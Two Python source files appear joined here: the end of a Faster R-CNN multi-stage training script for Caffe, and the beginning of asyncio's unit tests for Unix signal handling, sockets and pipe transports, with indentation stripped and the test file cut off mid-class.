# (e.g. "del net" in Python code). To work around this issue, each training
# stage is executed in a separate process using multiprocessing.Process.
# ------------------------------------------------------------------------------
def _init_caffe(cfg):
"""Initialize pycaffe in a training process.
"""
import caffe
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
caffe.set_random_seed(cfg.RNG_SEED)
# set up caffe
caffe.set_mode_gpu()
caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None):
"""Train a Region Proposal Network in a separate training process.
"""
# Not using any proposals, just ground-truth boxes
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to Fast R-CNN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name)
print 'roidb len: {}'.format(len(roidb))
output_dir = get_output_dir(imdb, None)
print 'Output will be saved to `{:s}`'.format(output_dir)
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rpn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
queue.put({'model_path': rpn_model_path})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
rpn_test_prototxt=None):
"""Use a trained RPN to generate proposals.
"""
cfg.TEST.RPN_PRE_NMS_TOP_N = -1 # no pre NMS filtering
cfg.TEST.RPN_POST_NMS_TOP_N = 2000 # limit top boxes after NMS
print 'RPN model: {}'.format(rpn_model_path)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
output_dir = get_output_dir(imdb, None)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Generate proposals on the imdb
rpn_proposals = imdb_proposals(rpn_net, imdb)
# Write proposals to disk and send the proposal file path through the
# multiprocessing queue
rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
rpn_proposals_path = os.path.join(
output_dir, rpn_net_name + '_proposals.pkl')
with open(rpn_proposals_path, 'wb') as f:
cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
print 'Wrote RPN proposals to {}'.format(rpn_proposals_path)
queue.put({'proposal_path': rpn_proposals_path})
def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, rpn_file=None):
"""Train a Fast R-CNN using proposals generated by an RPN.
"""
cfg.TRAIN.HAS_RPN = False # not generating prosals on-the-fly
cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
cfg.TRAIN.IMS_PER_BATCH = 2
print 'Init model: {}'.format(init_model)
print 'RPN proposals: {}'.format(rpn_file)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
output_dir = get_output_dir(imdb, None)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Train Fast R-CNN
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
fast_rcnn_model_path = model_paths[-1]
# Send Fast R-CNN model path over the multiprocessing queue
queue.put({'model_path': fast_rcnn_model_path})
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
# --------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are
# discarded (e.g. "del net" in Python code). To work around this issue, each
# training stage is executed in a separate process using
# multiprocessing.Process.
# --------------------------------------------------------------------------
# queue for communicated results between processes
mp_queue = mp.Queue()
# solves, iters, etc. for each training stage
solvers, max_iters, rpn_test_prototxt = get_solvers(args.net_name)
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[0],
max_iters=max_iters[0],
cfg=cfg)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 Fast R-CNN using RPN proposals, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[1],
max_iters=max_iters[1],
cfg=cfg,
rpn_file=rpn_stage1_out['proposal_path'])
p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
p.start()
fast_rcnn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, init from stage 1 Fast R-CNN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(fast_rcnn_stage1_out['model_path']),
solver=solvers[2],
max_iters=max_iters[2],
cfg=cfg)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage2_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage2_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 Fast R-CNN, init from stage 2 RPN R-CNN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(rpn_stage2_out['model_path']),
solver=solvers[3],
max_iters=max_iters[3],
cfg=cfg,
rpn_file=rpn_stage2_out['proposal_path'])
p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
p.start()
fast_rcnn_stage2_out = mp_queue.get()
p.join()
# Create final model (just a copy of the last stage)
final_path = os.path.join(
os.path.dirname(fast_rcnn_stage2_out['model_path']),
args.net_name + '_faster_rcnn_final.caffemodel')
print 'cp {} -> {}'.format(
fast_rcnn_stage2_out['model_path'], final_path)
shutil.copy(fast_rcnn_stage2_out['model_path'], final_path)
print 'Final model: {}'.format(final_path)
|
test_unix_events.py
|
"""Tests for unix_events.py."""
import collections
import gc
import errno
import io
import os
import pprint
import signal
import socket
import stat
import sys
import tempfile
import threading
import unittest
from unittest import mock
if sys.platform == 'win32':
raise unittest.SkipTest('UNIX only')
import asyncio
from asyncio import log
from asyncio import test_utils
from asyncio import unix_events
MOCK_ANY = mock.ANY
@unittest.skipUnless(signal, 'Signals are not supported')
class SelectorEventLoopSignalTests(unittest.TestCase):
def setUp(self):
self.loop = asyncio.SelectorEventLoop()
asyncio.set_event_loop(None)
def tearDown(self):
self.loop.close()
def test_check_signal(self):
self.assertRaises(
TypeError, self.loop._check_signal, '1')
self.assertRaises(
ValueError, self.loop._check_signal, signal.NSIG + 1)
def test_handle_signal_no_handler(self):
self.loop._handle_signal(signal.NSIG + 1, ())
def test_handle_signal_cancelled_handler(self):
h = asyncio.Handle(mock.Mock(), (),
loop=mock.Mock())
h.cancel()
self.loop._signal_handlers[signal.NSIG + 1] = h
self.loop.remove_signal_handler = mock.Mock()
self.loop._handle_signal(signal.NSIG + 1, ())
self.loop.remove_signal_handler.assert_called_with(signal.NSIG + 1)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_setup_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.set_wakeup_fd.side_effect = ValueError
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
cb = lambda: True
self.loop.add_signal_handler(signal.SIGHUP, cb)
h = self.loop._signal_handlers.get(signal.SIGHUP)
self.assertIsInstance(h, asyncio.Handle)
self.assertEqual(h._callback, cb)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_install_error(self, m_signal):
m_signal.NSIG = signal.NSIG
def set_wakeup_fd(fd):
if fd == -1:
raise ValueError()
m_signal.set_wakeup_fd = set_wakeup_fd
class Err(OSError):
errno = errno.EFAULT
m_signal.signal.side_effect = Err
self.assertRaises(
Err,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error2(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.loop._signal_handlers[signal.SIGHUP] = lambda: True
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(1, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error3(self, m_logging, m_signal):
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
m_signal.NSIG = signal.NSIG
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(2, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGHUP))
self.assertTrue(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGHUP, m_signal.SIG_DFL), m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_2(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.SIGINT = signal.SIGINT
self.loop.add_signal_handler(signal.SIGINT, lambda: True)
self.loop._signal_handlers[signal.SIGHUP] = object()
m_signal.set_wakeup_fd.reset_mock()
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGINT))
self.assertFalse(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGINT, m_signal.default_int_handler),
m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_remove_signal_handler_cleanup_error(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.set_wakeup_fd.side_effect = ValueError
self.loop.remove_signal_handler(signal.SIGHUP)
self.assertTrue(m_logging.info)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.signal.side_effect = OSError
self.assertRaises(
OSError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error2(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.assertRaises(
RuntimeError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_close(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.loop.add_signal_handler(signal.SIGCHLD, lambda: True)
self.assertEqual(len(self.loop._signal_handlers), 2)
m_signal.set_wakeup_fd.reset_mock()
self.loop.close()
self.assertEqual(len(self.loop._signal_handlers), 0)
m_signal.set_wakeup_fd.assert_called_once_with(-1)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'),
'UNIX Sockets are not supported')
class SelectorEventLoopUnixSocketTests(unittest.TestCase):
def setUp(self):
self.loop = asyncio.SelectorEventLoop()
asyncio.set_event_loop(None)
def tearDown(self):
self.loop.close()
def test_create_unix_server_existing_path_sock(self):
with test_utils.unix_socket_path() as path:
sock = socket.socket(socket.AF_UNIX)
sock.bind(path)
with sock:
coro = self.loop.create_unix_server(lambda: None, path)
with self.assertRaisesRegex(OSError,
'Address.*is already in use'):
self.loop.run_until_complete(coro)
def test_create_unix_server_existing_path_nonsock(self):
with tempfile.NamedTemporaryFile() as file:
coro = self.loop.create_unix_server(lambda: None, file.name)
with self.assertRaisesRegex(OSError,
'Address.*is already in use'):
self.loop.run_until_complete(coro)
def test_create_unix_server_ssl_bool(self):
coro = self.loop.create_unix_server(lambda: None, path='spam',
ssl=True)
with self.assertRaisesRegex(TypeError,
'ssl argument must be an SSLContext'):
self.loop.run_until_complete(coro)
def test_create_unix_server_nopath_nosock(self):
coro = self.loop.create_unix_server(lambda: None, path=None)
with self.assertRaisesRegex(ValueError,
'path was not specified, and no sock'):
self.loop.run_until_complete(coro)
def test_create_unix_server_path_inetsock(self):
sock = socket.socket()
with sock:
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Socket was expected'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.unix_events.socket')
def test_create_unix_server_bind_error(self, m_socket):
# Ensure that the socket is closed on any bind error
sock = mock.Mock()
m_socket.socket.return_value = sock
sock.bind.side_effect = OSError
coro = self.loop.create_unix_server(lambda: None, path="/test")
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
sock.bind.side_effect = MemoryError
coro = self.loop.create_unix_server(lambda: None, path="/test")
with self.assertRaises(MemoryError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_unix_connection_path_sock(self):
coro = self.loop.create_unix_connection(
lambda: None, '/dev/null', sock=object())
with self.assertRaisesRegex(ValueError, 'path and sock can not be'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nopath_nosock(self):
coro = self.loop.create_unix_connection(
lambda: None, None)
with self.assertRaisesRegex(ValueError,
'no path and sock were specified'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nossl_serverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, '/dev/null', server_hostname='spam')
with self.assertRaisesRegex(ValueError,
'server_hostname is only meaningful'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_ssl_noserverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, '/dev/null', ssl=True)
with self.assertRaisesRegex(
ValueError, 'you have to pass server_hostname when using ssl'):
self.loop.run_until_complete(coro)
class UnixReadPipeTransportTests(unittest.TestCase):
def setUp(self):
self.loop = test_utils.TestLoop()
self.protocol = test_utils.make_test_protocol(asyncio.Protocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
fcntl_patcher = mock.patch('fcntl.fcntl')
fcntl_patcher.start()
self.addCleanup(fcntl_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFIFO
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def test_ctor(self):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.assert_reader(5, tr._read_ready)
test_utils.run_briefly(self.loop)
self.protocol.connection_made.assert_called_with(tr)
def test_ctor_with_waiter(self):
fut = asyncio.Future(loop=self.loop)
unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol, fut)
test_utils.run_briefly(self.loop)
self.assertIsNone(fut.result())
@mock.patch('os.read')
def test__read_ready(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
m_read.return_value = b'data'
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.protocol.data_received.assert_called_with(b'data')
@mock.patch('os.read')
def test__read_ready_eof(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
m_read.return_value = b''
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.eof_received.assert_called_with()
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.read')
def test__read_ready_blocked(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
m_read.side_effect = BlockingIOError
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
test_utils.run_briefly(self.loop)
self.assertFalse(self.protocol.data_received.called)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.read')
def test__read_ready_error(self, m_read, m_logexc):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
err = OSError()
m_read.side_effect = err
tr._close = mock.Mock()
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
tr._close.assert_called_with(err)
m_logexc.assert_called_with(
test_utils.MockPattern(
'Fatal read error on pipe transport'
'\nprotocol:.*\ntransport:.*'),
exc_info=(OSError, MOCK_ANY, MOCK_ANY))
@mock.patch('os.read')
def test_pause_reading(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
m = mock.Mock()
self.loop.add_reader(5, m)
tr.pause_reading()
self.assertFalse(self.loop.readers)
@mock.patch('os.read')
def test_resume_reading(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
tr.resume_reading()
self.loop.assert_reader(5, tr._read_ready)
@mock.patch('os.read')
def test_close(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
tr._close = mock.Mock()
tr.close()
tr._close.assert_called_with(None)
@mock.patch('os.read')
def test_close_already_closing(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
tr._closing = True
tr._close = mock.Mock()
tr.close()
self.assertFalse(tr._close.called)
@mock.patch('os.read')
def test__close(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
err = object()
tr._close(err)
self.assertTrue(tr._closing)
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
def test__call_connection_lost(self):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertEqual(2, sys.getrefcount(self.protocol),
pprint.pformat(gc.get_referrers(self.protocol)))
self.assertIsNone(tr._loop)
self.assertEqual(4, sys.getrefcount(self.loop),
pprint.pformat(gc.get_referrers(self.loop)))
def test__call_connection_lost_with_err(self):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertEqual(2, sys.getrefcount(self.protocol),
pprint.pformat(gc.get_referrers(self.protocol)))
self.assertIsNone(tr._loop)
self.assertEqual(4, sys.getrefcount(self.loop),
pprint.pformat(gc.get_referrers(self.loop)))
class UnixWritePipeTransportTests(unittest.TestCase):
def setUp(self):
self.loop = test_utils.TestLoop()
self.protocol = test_utils.make_test_protocol(asyncio.BaseProtocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
fcntl_patcher = mock.patch('fcntl.fcntl')
fcntl_patcher.start()
self.addCleanup(fcntl_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFSOCK
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def test_ctor(self):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.assert_reader(5, tr._read_ready)
test_utils.run_briefly(self.loop)
self.protocol.connection_made.assert_called_with(tr)
def test_ctor_with_waiter(self):
fut = asyncio.Future(loop=self.loop)
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol, fut)
self.loop.assert_reader(5, tr._read_ready)
test_utils.run_briefly(self.loop)
self.assertEqual(None, fut.result())
def test_can_write_eof(self):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.assertTrue(tr.can_write_eof())
@mock.patch('os.write')
def test_write(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
m_write.return_value = 4
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
@mock.patch('os.write')
def test_write_no_data(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
tr.write(b'')
self.assertFalse(m_write.called)
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
@mock.patch('os.write')
def test_write_partial(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
m_write.return_value = 2
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual([b'ta'], tr._buffer)
@mock.patch('os.write')
def test_write_buffer(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
tr._buffer = [b'previous']
tr.write(b'data')
self.assertFalse(m_write.called)
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual([b'previous', b'data'], tr._buffer)
@mock.patch('os.write')
def test_write_again(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
m_write.side_effect = BlockingIOError()
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual([b'data'], tr._buffer)
@mock.patch('asyncio.unix_events.logger')
@mock.patch('os.write')
def test_write_err(self, m_write, m_log):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
err = OSError()
m_write.side_effect = err
tr._fatal_error = mock.Mock()
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
tr._fatal_error.assert_called_with(
err,
'Fatal write error on pipe transport')
self.assertEqual(1, tr._conn_lost)
tr.write(b'data')
self.assertEqual(2, tr._conn_lost)
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
# This is a bit overspecified. :-(
m_log.warning.assert_called_with(
'pipe closed by peer or os.write(pipe, data) raised exception.')
@mock.patch('os.write')
def test_write_close(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
tr._read_ready() # pipe was closed by peer
tr.write(b'data')
self.assertEqual(tr._conn_lost, 1)
tr.write(b'data')
self.assertEqual(tr._conn_lost, 2)
def test__read_ready(self):
tr = unix_events._UnixWritePipeTransport(self.loop, self.pipe,
self.protocol)
tr._read_ready()
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertTrue(tr._closing)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.write')
def test__write_ready(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
tr._buffer = [b'da', b'ta']
m_write.return_value = 4
tr._write_ready()
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
@mock.patch('os.write')
def test__write_ready_partial(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
tr._buffer = [b'da', b'ta']
m_write.return_value = 3
tr._write_ready()
m_write.assert_called_with(5, b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual([b'a'], tr._buffer)
@mock.patch('os.write')
def test__write_ready_again(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
tr._buffer = [b'da', b'ta']
m_write.side_effect = BlockingIOError()
tr._write_ready()
m_write.assert_called_with(5, b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual([b'data'], tr._buffer)
@mock.patch('os.write')
def test__write_ready_empty(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
tr._buffer = [b'da', b'ta']
m_write.return_value = 0
tr._write_ready()
m_write.assert_called_with(5, b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual([b'data'], tr._buffer)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.write')
def test__write_ready_err(self, m_write, m_logexc):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
tr._buffer = [b'da', b'ta']
m_write.side_effect = err = OSError()
tr._write_ready()
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual([], tr._buffer)
self.assertTrue(tr._closing)
m_logexc.assert_called_with(
test_utils.MockPattern(
'Fatal write error on pipe transport'
'\nprotocol:.*\ntransport:.*'),
exc_info=(OSError, MOCK_ANY, MOCK_ANY))
self.assertEqual(1, tr._conn_lost)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
@mock.patch('os.write')
def test__write_ready_closing(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
tr._closing = True
tr._buffer = [b'da', b'ta']
m_write.return_value = 4
tr._write_ready()
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual([], tr._buffer)
self.protocol.connection_lost.assert_called_with(None)
self.pipe.close.assert_called_with()
@mock.patch('os.write')
def test_abort(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
self.loop.add_reader(5, tr._read_ready)
tr._buffer = [b'da', b'ta']
tr.abort()
self.assertFalse(m_write.called)
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
self.assertTrue(tr._closing)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test__call_connection_lost(self):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertEqual(2, sys.getrefcount(self.protocol),
pprint.pformat(gc.get_referrers(self.protocol)))
self.assertIsNone(tr._loop)
self.assertEqual(4, sys.getrefcount(self.loop),
pprint.pformat(gc.get_referrers(self.loop)))
def test__call_connection_lost_with_err(self):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertEqual(2, sys.getrefcount(self.protocol),
pprint.pformat(gc.get_referrers(self.protocol)))
self.assertIsNone(tr._loop)
self.assertEqual(4, sys.getrefcount(self.loop),
pprint.pformat(gc.get_referrers(self.loop)))
def test_close(self):
